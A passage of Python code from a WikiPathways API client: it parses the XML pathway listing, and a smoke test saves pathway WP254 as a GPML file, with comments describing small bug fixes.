        response = requests.get(self.base_iri + 'listPathways', params=request_params)
        dom = ET.fromstring(response.text)
        pathways = []
        for pathway_node in dom.findall('ns1:pathways', self.NAMESPACES):
            pathway_using_api_terms = {}
            for child_node in pathway_node:
                pathway_using_api_terms[ET.QName(child_node).localname] = child_node.text
            pathway = self.__convert_api_terms_to_standard_terms(pathway_using_api_terms)
            pathway = self.__enrich_pathway(pathway)
            pathways.append(pathway)
        return pathways
if __name__ == '__main__':
    # Smoke test: fetch pathway WP254 as GPML and save it locally.
    # Fixes vs. original: `version` is the string '0' (the method signature
    # documents and defaults a str); the output filename now matches the
    # requested pathway ID (was the mismatched 'WP205.gpml'); and the file
    # is opened in 'w' mode so reruns overwrite instead of appending a
    # second XML document to the same file.
    client = WikipathwaysApiClient()
    wp_id_data = client.get_pathway_as(file_format='gpml', identifier='WP254', version='0')
    with open('WP254.gpml', 'w') as file_out:
        file_out.write(wp_id_data)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.